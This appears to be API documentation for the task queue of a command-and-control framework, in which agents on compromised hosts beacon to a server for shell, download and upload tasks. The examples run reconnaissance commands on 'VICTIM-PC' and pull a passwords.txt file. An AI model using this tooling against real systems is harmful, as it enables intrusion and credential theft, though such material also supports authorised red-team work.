Skip to main content

Overview

CommandQueue manages pending tasks for all agent sessions using asyncio queues. Each session has its own queue, and all tasks are persisted to the database for durability across server restarts. Source: server/command_queue.py

TaskStatus Enum

class TaskStatus(str, Enum):
    PENDING    = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE   = 'COMPLETE'
    ERROR      = 'ERROR'
Represents the lifecycle state of a task.
PENDING
str
Task queued, waiting to be sent to agent
DISPATCHED
str
Task sent to agent, awaiting result
COMPLETE
str
Task executed successfully, result stored
ERROR
str
Task execution failed or timed out

Task Dataclass

@dataclass
class Task:
    task_id:    str
    session_id: str
    command:    str
    args:       list
    timeout_s:  int
    queued_at:  float
    status:     TaskStatus = TaskStatus.PENDING
Represents a single command task for an agent.
task_id
str
Unique UUID for the task
session_id
str
UUID of the agent session this task belongs to
command
str
Command type: shell, download, upload, sleep, etc.
args
list
Command-specific arguments. Example: ["whoami"] for shell command
timeout_s
int
Maximum execution time in seconds before timeout
queued_at
float
Unix timestamp when task was queued
status
TaskStatus
default:"PENDING"
Current task status

CommandQueue Class

Constructor

def __init__(self)
Initializes empty command queue with asyncio lock. Internal State:
self._queues: dict[str, asyncio.Queue] = {}  # session_id -> Queue[Task]
self._tasks:  dict[str, Task]          = {}  # task_id -> Task (for O(1) lookup)
self._lock = asyncio.Lock()
Architecture:
  • One asyncio.Queue per session for FIFO task ordering
  • Flat task registry for fast lookups by task_id
  • Lock for thread-safe concurrent access

Methods

enqueue_task()

async def enqueue_task(self, session_id: str, command: str, args: list,
                       timeout_s: int, db: Database) -> str
Create a Task, add to session queue, persist to DB, return task_id.
session_id
str
required
UUID of the agent session to receive this task
command
str
required
Command type: shell, download, upload, sleep, etc.
args
list
required
Command-specific arguments
timeout_s
int
required
Maximum execution time in seconds
db
Database
required
Database instance for persistence
return
str
Newly created task_id (UUID)
Example:
from server.command_queue import CommandQueue
from server.storage import Database

async with Database() as db:
    cq = CommandQueue()
    
    # Queue a shell command
    task_id = await cq.enqueue_task(
        session_id='550e8400-e29b-41d4-a716-446655440000',
        command='shell',
        args=['whoami'],
        timeout_s=30,
        db=db
    )
    print(f"Task queued: {task_id}")
    
    # Queue a file download
    task_id2 = await cq.enqueue_task(
        session_id='550e8400-e29b-41d4-a716-446655440000',
        command='download',
        args=['C:\\Users\\jdoe\\passwords.txt'],
        timeout_s=60,
        db=db
    )
Behavior:
  • Generates new UUID for task_id
  • Sets queued_at to current time
  • Sets status to PENDING
  • Adds task to session’s queue (creates queue if needed)
  • Stores task in flat registry
  • Persists to database
  • Logs enqueue event

peek_task()

async def peek_task(self, session_id: str, db: Database = None) -> Task | None
Return the next PENDING task for a session without removing it from the queue.
session_id
str
required
UUID of the agent session
db
Database
Optional database instance. If provided, checks DB for tasks not yet loaded into memory.
return
Task | None
Next PENDING task if available, None if queue is empty
Example:
# Agent polls for next task
task = await cq.peek_task(session_id, db=db)

if task:
    print(f"Dispatching: {task.command} {task.args}")
    await cq.mark_dispatched(task.task_id, db)
else:
    print("No pending tasks")
Behavior:
  1. Memory Check: Searches in-memory queue for PENDING tasks
  2. Database Fallback: If no task in memory and db provided, queries database
  3. Lazy Load: If task found in DB, loads into memory and adds to queue
  4. Non-Destructive: Task remains in queue until status changes
Use Case: Server restart - tasks persist in DB and are loaded on first peek

mark_dispatched()

async def mark_dispatched(self, task_id: str, db: Database) -> None
Set task status to DISPATCHED in memory and in DB.
task_id
str
required
UUID of the task to mark dispatched
db
Database
required
Database instance for persistence
Example:
task = await cq.peek_task(session_id, db=db)
if task:
    # Send task to agent via beacon response
    await cq.mark_dispatched(task.task_id, db)
Behavior:
  • Updates task.status = TaskStatus.DISPATCHED in memory
  • Persists to database
  • Logs dispatch event
  • Next peek_task() call will skip this task (no longer PENDING)

mark_complete()

async def mark_complete(self, task_id: str, result: dict,
                        db: Database) -> None
Set task status to COMPLETE, persist result to DB.
task_id
str
required
UUID of the completed task
result
dict
required
Task execution result containing:
  • stdout: Command standard output
  • stderr: Command standard error
  • exit_code: Process exit code
  • duration_ms: Execution duration in milliseconds
db
Database
required
Database instance for persistence
Example:
# Agent submits task result
result = {
    'stdout': 'VICTIM-PC\\jdoe',
    'stderr': '',
    'exit_code': 0,
    'duration_ms': 42
}

await cq.mark_complete(task_id, result, db)

# Result now available via CLI or web UI
Behavior:
  • Updates task.status = TaskStatus.COMPLETE in memory
  • Persists status to database
  • Inserts result row into database with generated result_id
  • Logs completion with exit_code

mark_error()

async def mark_error(self, task_id: str, db: Database) -> None
Set task status to ERROR in memory and in DB.
task_id
str
required
UUID of the failed task
db
Database
required
Database instance for persistence
Example:
# Agent reports task timeout or execution failure
await cq.mark_error(task_id, db)
Behavior:
  • Updates task.status = TaskStatus.ERROR in memory
  • Persists to database
  • Logs error event
Use Cases:
  • Task timeout on agent
  • Command execution failure
  • Agent crash during execution

get_tasks_for_session()

async def get_tasks_for_session(self, session_id: str) -> list[Task]
Return all in-memory tasks for a session ordered by queued_at.
session_id
str
required
UUID of the agent session
return
list[Task]
List of Task objects sorted by queued_at ascending (oldest first)
Example:
tasks = await cq.get_tasks_for_session(session_id)

for task in tasks:
    status_icon = {
        TaskStatus.PENDING: '⏳',
        TaskStatus.DISPATCHED: '📤',
        TaskStatus.COMPLETE: '✓',
        TaskStatus.ERROR: '✗'
    }[task.status]
    
    print(f"{status_icon} {task.command} {task.args} - {task.status}")
Output:
✓ shell ['whoami'] - COMPLETE
📤 download ['C:\\passwords.txt'] - DISPATCHED
⏳ shell ['ipconfig'] - PENDING
Use Cases:
  • CLI tasks command
  • Web UI task history
  • Operator monitoring

Usage Patterns

Complete Task Lifecycle

async with Database() as db:
    cq = CommandQueue()
    
    # Operator queues command via CLI
    task_id = await cq.enqueue_task(
        session_id=session_id,
        command='shell',
        args=['whoami'],
        timeout_s=30,
        db=db
    )
    
    # Agent beacons and pulls task
    task = await cq.peek_task(session_id, db=db)
    if task:
        # Server sends task to agent
        await cq.mark_dispatched(task.task_id, db)
    
    # Agent executes and returns result
    result = {
        'stdout': 'VICTIM-PC\\jdoe',
        'stderr': '',
        'exit_code': 0,
        'duration_ms': 42
    }
    await cq.mark_complete(task_id, result, db)
    
    # Operator views results
    tasks = await cq.get_tasks_for_session(session_id)
    for t in tasks:
        if t.status == TaskStatus.COMPLETE:
            # Fetch result from database
            results = await db.get_results_for_session(session_id)
            print(results[0]['stdout'])

Error Handling

# Agent timeout
if task_duration > task.timeout_s:
    await cq.mark_error(task_id, db)

# Agent crash detection (server-side)
if time.time() - task.queued_at > task.timeout_s * 2:
    # Task dispatched but no result received
    await cq.mark_error(task_id, db)

Queue Priority

Tasks are dispatched in FIFO order per session:
# Queue multiple tasks
await cq.enqueue_task(sid, 'shell', ['whoami'], 30, db)
await cq.enqueue_task(sid, 'shell', ['hostname'], 30, db)
await cq.enqueue_task(sid, 'shell', ['ipconfig'], 30, db)

# peek_task() always returns oldest PENDING task
task1 = await cq.peek_task(sid, db)  # Returns 'whoami'
await cq.mark_dispatched(task1.task_id, db)

task2 = await cq.peek_task(sid, db)  # Returns 'hostname'
await cq.mark_dispatched(task2.task_id, db)

task3 = await cq.peek_task(sid, db)  # Returns 'ipconfig'

Integration Points

Server Main

Used in server_main.py beacon handlers:
from server.command_queue import CommandQueue

cmd_queue = CommandQueue()

# Task pull handler
task = await cmd_queue.peek_task(session_id, db=db)
if task:
    await cmd_queue.mark_dispatched(task.task_id, db)
    return task_dispatch_response(task)

# Task result handler
await cmd_queue.mark_complete(task_id, result_payload, db)

CLI Commands

Used in cli/task_commands.py:
# Queue new task
task_id = await cmd_queue.enqueue_task(
    session_id, command, args, timeout_s, db
)

# View task history
tasks = await cmd_queue.get_tasks_for_session(session_id)
for task in tasks:
    display_task(task)

Testing

Self-Test Suite

Run built-in tests:
python -m server.command_queue
Test Coverage:
  • enqueue_task generates valid UUID
  • peek_task returns PENDING task
  • peek_task is non-destructive
  • mark_dispatched excludes task from future peeks
  • mark_complete stores result in DB
  • get_tasks_for_session ordering
  • peek_task returns None for unknown session
  • mark_error sets ERROR status
Output:
Running command_queue self-test...
  [OK] enqueue_task
  [OK] peek_task returns PENDING task
  [OK] peek_task is non-destructive
  [OK] mark_dispatched
  [OK] mark_complete
  [OK] get_tasks_for_session ordering
  [OK] peek_task returns None for unknown session
  [OK] mark_error

All command_queue self-tests passed.

Performance Considerations

All queued and in-flight tasks held in memory. 10,000 tasks consume ~5-10 MB RAM.
enqueue_task and peek_task are O(1) for in-memory operations. Database fallback in peek_task adds query latency.
Completed tasks remain in memory indefinitely. Consider periodic cleanup for long-running operations.
Single lock protects all queues. High task throughput may see contention. Consider per-session locks for scaling.

Logging

Structured logging with contextual fields:
logger.info('task enqueued', extra={
    'session_id': session_id,
    'task_id':    task.task_id,
    'command':    command,
})
Events:
  • Task enqueued
  • Task loaded from DB
  • Task dispatched
  • Task complete
  • Task error

Server Main

Beacon endpoint integration

Database

Task and result persistence

SessionManager

Session state management

Task Commands

CLI task management

Build docs developers (and LLMs) love